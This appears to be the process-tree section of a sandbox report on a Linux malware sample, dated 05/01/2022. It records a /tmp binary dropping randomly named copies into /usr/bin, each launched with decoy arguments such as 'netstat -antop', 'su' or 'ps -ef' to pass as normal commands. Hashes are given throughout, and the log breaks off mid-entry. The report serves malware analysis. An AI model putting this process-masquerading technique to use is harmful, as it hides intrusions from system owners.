                                                                  Start time:19:41:33
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/kexmeeeolw
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:bbc6ce9c97f6973d61f78fc452aab5c7

                                                                  General

                                                                  Start time:19:41:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:32
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:32
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/kexmeeeolw
                                                                  Arguments:/usr/bin/kexmeeeolw id 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:bbc6ce9c97f6973d61f78fc452aab5c7

                                                                  General

                                                                  Start time:19:41:33
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/kexmeeeolw
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:bbc6ce9c97f6973d61f78fc452aab5c7

                                                                  General

                                                                  Start time:19:41:33
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:33
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:33
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/kexmeeeolw
                                                                  Arguments:/usr/bin/kexmeeeolw gnome-terminal 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:bbc6ce9c97f6973d61f78fc452aab5c7

                                                                  General

                                                                  Start time:19:41:33
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/kexmeeeolw
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:bbc6ce9c97f6973d61f78fc452aab5c7

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/hhmykaposi
                                                                  Arguments:/usr/bin/hhmykaposi "netstat -antop" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:0acf5a216e59d96b030e0170813fa8d1

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/hhmykaposi
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:0acf5a216e59d96b030e0170813fa8d1

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/hhmykaposi
                                                                  Arguments:/usr/bin/hhmykaposi "cat resolv.conf" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:0acf5a216e59d96b030e0170813fa8d1

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/hhmykaposi
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:0acf5a216e59d96b030e0170813fa8d1

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/hhmykaposi
                                                                  Arguments:/usr/bin/hhmykaposi "netstat -an" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:0acf5a216e59d96b030e0170813fa8d1

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/hhmykaposi
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:0acf5a216e59d96b030e0170813fa8d1

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/hhmykaposi
                                                                  Arguments:/usr/bin/hhmykaposi su 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:0acf5a216e59d96b030e0170813fa8d1

                                                                  General

                                                                  Start time:19:41:39
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/hhmykaposi
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:0acf5a216e59d96b030e0170813fa8d1

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:38
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:39
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/hhmykaposi
                                                                  Arguments:/usr/bin/hhmykaposi id 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:0acf5a216e59d96b030e0170813fa8d1

                                                                  General

                                                                  Start time:19:41:40
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/hhmykaposi
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:0acf5a216e59d96b030e0170813fa8d1

                                                                  General

                                                                  Start time:19:41:44
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:44
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:44
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ppozyahgxh
                                                                  Arguments:/usr/bin/ppozyahgxh "sleep 1" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:10d6cf5f9ffdf83976fe612372512b0c

                                                                  General

                                                                  Start time:19:41:44
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ppozyahgxh
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:10d6cf5f9ffdf83976fe612372512b0c

                                                                  General

                                                                  Start time:19:41:44
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:44
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:44
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ppozyahgxh
                                                                  Arguments:/usr/bin/ppozyahgxh ifconfig 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:10d6cf5f9ffdf83976fe612372512b0c

                                                                  General

                                                                  Start time:19:41:45
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ppozyahgxh
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:10d6cf5f9ffdf83976fe612372512b0c

                                                                  General

                                                                  Start time:19:41:45
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:45
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:45
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ppozyahgxh
                                                                  Arguments:/usr/bin/ppozyahgxh "sleep 1" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:10d6cf5f9ffdf83976fe612372512b0c

                                                                  General

                                                                  Start time:19:41:45
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ppozyahgxh
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:10d6cf5f9ffdf83976fe612372512b0c

                                                                  General

                                                                  Start time:19:41:45
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:45
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:45
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ppozyahgxh
                                                                  Arguments:/usr/bin/ppozyahgxh uptime 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:10d6cf5f9ffdf83976fe612372512b0c

                                                                  General

                                                                  Start time:19:41:46
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ppozyahgxh
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:10d6cf5f9ffdf83976fe612372512b0c

                                                                  General

                                                                  Start time:19:41:45
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:45
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:45
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ppozyahgxh
                                                                  Arguments:/usr/bin/ppozyahgxh bash 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:10d6cf5f9ffdf83976fe612372512b0c

                                                                  General

                                                                  Start time:19:41:46
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ppozyahgxh
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:10d6cf5f9ffdf83976fe612372512b0c

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ybfpvjxtlx
                                                                  Arguments:/usr/bin/ybfpvjxtlx su 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:070327196e903c59b3ae1a9dbda601d6

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ybfpvjxtlx
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:070327196e903c59b3ae1a9dbda601d6

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ybfpvjxtlx
                                                                  Arguments:/usr/bin/ybfpvjxtlx "ls -la" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:070327196e903c59b3ae1a9dbda601d6

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ybfpvjxtlx
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:070327196e903c59b3ae1a9dbda601d6

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ybfpvjxtlx
                                                                  Arguments:/usr/bin/ybfpvjxtlx "sleep 1" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:070327196e903c59b3ae1a9dbda601d6

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ybfpvjxtlx
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:070327196e903c59b3ae1a9dbda601d6

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ybfpvjxtlx
                                                                  Arguments:/usr/bin/ybfpvjxtlx "netstat -antop" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:070327196e903c59b3ae1a9dbda601d6

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ybfpvjxtlx
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:070327196e903c59b3ae1a9dbda601d6

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ybfpvjxtlx
                                                                  Arguments:/usr/bin/ybfpvjxtlx "ifconfig eth0" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:070327196e903c59b3ae1a9dbda601d6

                                                                  General

                                                                  Start time:19:41:51
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ybfpvjxtlx
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:070327196e903c59b3ae1a9dbda601d6

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/bingytdcwk
                                                                  Arguments:/usr/bin/bingytdcwk "ifconfig eth0" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:99cb05f7504de48289b5497f2ba8751e

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/bingytdcwk
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:99cb05f7504de48289b5497f2ba8751e

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/bingytdcwk
                                                                  Arguments:/usr/bin/bingytdcwk "ifconfig eth0" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:99cb05f7504de48289b5497f2ba8751e

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/bingytdcwk
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:99cb05f7504de48289b5497f2ba8751e

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/bingytdcwk
                                                                  Arguments:/usr/bin/bingytdcwk "netstat -an" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:99cb05f7504de48289b5497f2ba8751e

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/bingytdcwk
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:99cb05f7504de48289b5497f2ba8751e

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/bingytdcwk
                                                                  Arguments:/usr/bin/bingytdcwk id 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:99cb05f7504de48289b5497f2ba8751e

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/bingytdcwk
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:99cb05f7504de48289b5497f2ba8751e

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/bingytdcwk
                                                                  Arguments:/usr/bin/bingytdcwk "sleep 1" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:99cb05f7504de48289b5497f2ba8751e

                                                                  General

                                                                  Start time:19:41:57
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/bingytdcwk
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:99cb05f7504de48289b5497f2ba8751e

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/xnntpqonav
                                                                  Arguments:/usr/bin/xnntpqonav "netstat -antop" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:bb587ebc1efd7483be7ebaa646fd58bf

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/xnntpqonav
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:bb587ebc1efd7483be7ebaa646fd58bf

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/xnntpqonav
                                                                  Arguments:/usr/bin/xnntpqonav su 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:bb587ebc1efd7483be7ebaa646fd58bf

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/xnntpqonav
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:bb587ebc1efd7483be7ebaa646fd58bf

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/xnntpqonav
                                                                  Arguments:/usr/bin/xnntpqonav sh 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:bb587ebc1efd7483be7ebaa646fd58bf

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/xnntpqonav
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:bb587ebc1efd7483be7ebaa646fd58bf

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/xnntpqonav
                                                                  Arguments:/usr/bin/xnntpqonav who 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:bb587ebc1efd7483be7ebaa646fd58bf

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/xnntpqonav
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:bb587ebc1efd7483be7ebaa646fd58bf

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/xnntpqonav
                                                                  Arguments:/usr/bin/xnntpqonav "grep \"A\"" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:bb587ebc1efd7483be7ebaa646fd58bf

                                                                  General

                                                                  Start time:19:42:03
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/xnntpqonav
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:bb587ebc1efd7483be7ebaa646fd58bf

                                                                  General

                                                                  Start time:19:42:08
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:08
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:08
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/lzqmjtjpqw
                                                                  Arguments:/usr/bin/lzqmjtjpqw "ps -ef" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:7a667d082ecd9ac2cdd0aeabc5b8446d

                                                                  General

                                                                  Start time:19:42:08
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/lzqmjtjpqw
                                                                  Arguments:n/a
                                                                  File size:548627 bytes
                                                                  MD5 hash:7a667d082ecd9ac2cdd0aeabc5b8446d

                                                                  General

                                                                  Start time:19:42:08
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:08
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:08
